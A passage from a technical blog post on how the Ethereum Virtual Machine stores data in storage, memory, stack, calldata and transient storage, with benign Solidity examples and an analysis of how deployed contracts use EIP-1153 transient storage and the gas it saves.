    | time      | uint160                                     | 1    | 0      | 20    | src/Storage.sol:Storage |
    | title     | string                                      | 2    | 0      | 32    | src/Storage.sol:Storage |
    | data      | struct Storage.SomeData                     | 3    | 0      | 64    | src/Storage.sol:Storage |
    | balances  | mapping(address => uint256)                 | 5    | 0      | 32    | src/Storage.sol:Storage |
    | userDatas | mapping(address => struct Storage.SomeData) | 6    | 0      | 32    | src/Storage.sol:Storage |
    

    All the defined values are stored starting from slot 0 in the order they are defined.

    1. First, the flags array occupies the entire first slot (slot 0). Each bool takes only 1 byte to store, so the whole array uses just 8 bytes, but as array data it still reserves the full 32-byte slot.
    2. The uint160 time is stored in the second slot. Even though it only takes 20 bytes to store, meaning it can fit in the remaining space of the first slot, it must start on the second slot since the first slot is storing an array.
    3. The string title takes up the entire third slot, since it is a dynamic data type. The slot stores the length of the string, and the actual characters of the string should be stored starting at keccak256(2).
    4. Next, the entire data struct takes up 2 slots. The first slot of the struct packs both the x and y uint128 values, since they each only take 16 bytes. Then, the second slot of the struct stores the dynamic bytes value.
    5. Finally, there are two mapping values, each taking up an empty slot to reserve their mapping. The actual mapping values would be stored at keccak(pad(key) . uint256(5)) or keccak(pad(key) . uint256(6)) respectively.

    Here’s a diagram visualizing the storage:

    [Diagram: storage layout of the Storage contract]

    If the title or z variables contain data longer than 31 bytes, their contents are instead stored starting at keccak256(s), as shown by the arrows. The mapping values are stored following the key-hashing rules defined above.

    Finally, storage variables can also be declared as immutable or constant. These variables do not change over the lifetime of the contract, which saves gas since their reads can be optimized away. constant variables are fixed at compile time, and the Solidity compiler replaces every reference with the defined value during compilation. immutable variables, on the other hand, can still be assigned during construction of the contract; at deployment, all references to them in the runtime code are replaced with the assigned value.
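
    A small sketch of the difference (a hypothetical contract of ours, not from the post):

    contract Config {
        // Replaced by the literal 30 at compile time; never occupies a storage slot.
        uint256 public constant FEE_BPS = 30;
    
        // Assigned once in the constructor; the value is embedded into the
        // deployed runtime bytecode, so reading it costs no SLOAD.
        address public immutable treasury;
    
        constructor(address _treasury) {
            treasury = _treasury;
        }
    }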

    Memory

    Unlike storage, memory does not persist between transactions: all memory values are discarded at the end of the call. Since memory is accessed in fixed 32-byte words, every element is aligned to its own 32-byte chunk. So while uint8[16] nums occupies a single 32-byte word in storage, it takes up sixteen 32-byte words in memory. The same splitting also happens to structs, regardless of how they are defined.

    For reference types like bytes or string, variable declarations need to distinguish between memory pointers and storage pointers, using the memory or storage keyword respectively.

    Mappings do not exist in memory at all, and memory arrays cannot be resized, since constantly growing memory is inefficient and expensive. Though you can allocate arrays whose length is fixed at allocation time using new <type>[](size), you cannot change their size afterwards the way you can with storage arrays using .push and .pop.

    Finally, memory optimization is very important, since the gas cost for memory scales quadratically with size as memory expands, rather than linearly.
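
    The following sketch (ours, with hypothetical names) illustrates the memory rules above: the storage array packs into one slot, while the memory array gets a full 32-byte word per element and cannot be resized after allocation:

    contract MemoryDemo {
        uint8[16] packedFlags; // 16 bytes, packed into a single storage slot
    
        function sum(uint256 n) external pure returns (uint256 total) {
            // Allocated once with a fixed length; each uint8 element still
            // occupies its own 32-byte word in memory.
            uint8[] memory nums = new uint8[](n);
            for (uint256 i = 0; i < n; i++) {
                nums[i] = uint8(i); // no .push/.pop: the length cannot change
                total += nums[i];
            }
        }
    }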

    Stack

    Like memory, stack data only exists for the current execution. The stack is very simple, being just a list of 32-byte elements that are stored sequentially one after another. It is modified using POP, PUSH, DUP, and SWAP instructions, much like stacks in standard executables. Currently, the stack only stores up to 1024 values.

    Most actual computation happens on the stack. For example, arithmetic opcodes such as ADD or MUL pop two values from the stack and push the result of the operation back onto it.

    Calldata

    Calldata is similar to memory and stack data in that it only exists within the context of one function call. Like memory, all values must also be padded to 32 bytes. However, unlike memory, which is allocated during contract interactions, calldata stores the read-only arguments that are passed in from external sources, like an EOA or another smart contract. It is important to note that if you want to edit the values passed in from calldata, you must copy them to memory first.

    Calldata is passed in with the rest of the data during the transaction, so it must be packed properly according to the specified ABI of the function that is being called.
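
    As a brief sketch of the read-only nature of calldata (hypothetical functions, assuming the behaviour described above):

    contract CalldataDemo {
        // `amounts` stays in calldata: cheap to pass in, but read-only.
        function total(uint256[] calldata amounts) external pure returns (uint256 sum) {
            for (uint256 i = 0; i < amounts.length; i++) {
                sum += amounts[i];
            }
        }
    
        // To modify the values, copy them into memory first.
        function doubled(uint256[] calldata amounts) external pure returns (uint256[] memory out) {
            out = amounts; // calldata -> memory copy
            for (uint256 i = 0; i < out.length; i++) {
                out[i] *= 2; // mutates the memory copy, never the calldata
            }
        }
    }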

    Transient Storage

    Transient storage is a fairly new addition to the EVM: Solidity only began supporting the opcodes (via inline assembly) in 2024, with proper language support arriving later, as noted above. It is meant to serve as an efficient key-value mapping that exists for the duration of an entire transaction. Its opcodes, TSTORE and TLOAD, always cost 100 gas each, making transient storage much more gas-efficient than regular storage.

    The specialty of transient storage is that it persists across call contexts within the same transaction. This is perfect for scenarios like reentrancy guards: a contract can set a flag in transient storage and check, at any point during the transaction, whether that flag has already been set. At the end of the transaction the flag is wiped completely, so the guard can be used as normal in future transactions.

    Despite its transient nature, it is important to note that this storage is still part of the Ethereum state. As such, it must adhere to similar rules and constraints of those of regular storage. For instance, in a STATICCALL context, which prohibits state modifications, transient storage cannot be altered, meaning only the TLOAD opcode is allowed and not TSTORE.
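
    With solc ≥ 0.8.28 (per the update note earlier), value-type state variables can also be declared transient directly, without inline assembly. A minimal sketch, assuming that syntax (the contract and names are ours):

    contract TransientFlag {
        // Backed by TSTORE/TLOAD: visible across calls within a transaction,
        // automatically cleared once the transaction ends.
        bool transient locked;
    
        modifier nonReentrant() {
            require(!locked, "reentrancy");
            locked = true;
            _;
            locked = false; // reset so the guard composes within the same transaction
        }
    }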

    EIP-1153 impact analysis

    Since transient storage is a relatively recent feature, we were able to be comprehensive in inspecting all cases of how it has been used as of Ethereum block number 20129223. We found that of the ~250 deployed contracts containing (or referencing libraries containing) TSTORE or TLOAD opcodes, there were ~180 unique source files, meaning over 60 of these deployed contracts were duplicates deployed cross-chain.

    Here is the recorded distribution of the usage of transient storage in these ~190 contracts:

    [Chart: distribution of transient storage usage across the analyzed contracts]

    We were able to classify the roughly 190 unique on-chain contracts that use this feature into 6 general categories:

    1. First and foremost, over 50% of the usage of transient storage is on reentrancy guards. This makes sense, as reentrancy protection is the perfect use case for transient storage and is also very easy to implement, with a simple one possibly looking like:
    modifier ReentrancyGuard {
        assembly {
            // If the guard has been set, there is re-entrancy, so revert
            if tload(0) { revert(0, 0) } 
            // Otherwise, set the guard
            tstore(0, 1)
        }
        _;
        // Unlocks the guard, making the pattern composable.
        // After the function exits, it can be called again, even in the same transaction.
        assembly {
            tstore(0, 0)
        }
    }
    
    2. On the other hand, only 3.6% of the contracts used this pattern as an entrancy lock, locking the contract state between calls so that certain functions can only be called after other functions have been invoked earlier in the same transaction. Here’s a short example.
    // keccak256("entrancy.slot")
    uint256 constant ENTRANCY_SLOT = 0x53/*...*/15;
    
    function enter() {
        uint256 entrancy = 0;
        assembly {
            entrancy := tload(ENTRANCY_SLOT)
        }
        if (entrancy != 0) {
    				revert("Already entered");
        }
    
        entrancy = 1;
        assembly {
            tstore(ENTRANCY_SLOT, entrancy)
        }
    }
    
    function withdraw() {
        uint256 entrancy = 0;
        assembly {
            entrancy := tload(ENTRANCY_SLOT)
        }
    
        if (entrancy == 0) {
            revert("Not entered yet");
        }
    
        // ...
    }
    
    3. Next, around 6% of the contracts used transient storage to preserve contract context for callback functions or cross-chain transactions. This was mostly on bridge contracts, like this one here.
    4. 8.3% of the contracts used transient storage to keep a temporary copy of the contract state to verify that certain actions are authorized. For example, this contract by OpenSea temporarily stores an authorized operator, specific tokens, and amounts related to those tokens to validate that all transfers happen as they should.
    5. A bit less than 9% of the contracts used transient storage for their own specialized purposes. For example, an airdropping contract utilizes TSTORE as a hashmap to track and manage eligible recipients within the transaction context.
    6. Finally, 20% of the contracts, although they had no transient storage opcodes in their own bytecode, contained functions that utilised transient storage in referenced libraries. Most of these libraries are OpenZeppelin internals, such as their implementation of ERC1967 (see StorageSlot).

    The introduction of transient storage marks a significant evolution in the EVM’s data management capabilities. Our analysis at Dedaub reveals that while it’s still in its early stages of adoption, transient storage is already making a notable impact, particularly in smart contract security and efficiency.


    Key takeaways from our analysis of transient storage usage include:

    • Reentrancy guards dominate the current use cases, accounting for over 50% of transient storage implementations. This highlights the immediate value developers see in using transient storage for cross-function state management within a transaction.
    • Beyond security, innovative developers are finding creative ways to leverage transient storage for storing contextual information and managing contexts throughout complex transactions.
    • The adoption of transient storage, while still limited, shows promise for improving gas efficiency and simplifying certain smart contract patterns.

    Gas efficiency improvements

    In our analysis of transient storage usage, we also evaluated its gas efficiency compared to regular storage. To do this, we collected the last 100 transactions for each of the contracts analyzed. For each transaction, we obtained its execution trace and used a Python script to simulate gas costs by replacing TSTORE operations with SSTORE under the same conditions (including cold load penalties and other storage rules).

    The results were impressive: across all use cases, using transient storage led to an average gas saving of 91.59% compared to regular storage operations. Below, you can find a more detailed graph that shows gas savings per category. It is interesting to note that in the case of Specialized Functionality, gas savings of around 98.7% were recorded. This is because of the airdropping contract mentioned above; in that case, memory might have been a more appropriate point of comparison.

    Conclusion

    As the Ethereum ecosystem continues to evolve, we expect to see more diverse and sophisticated uses of transient storage emerge. Its unique properties – persisting across internal calls within a transaction while being more gas-efficient than regular storage – open up new possibilities for optimizing smart contract design and execution.

    Below we are publishing the dataset and scripts that were used for the above post.

    dump_transient_traces.zip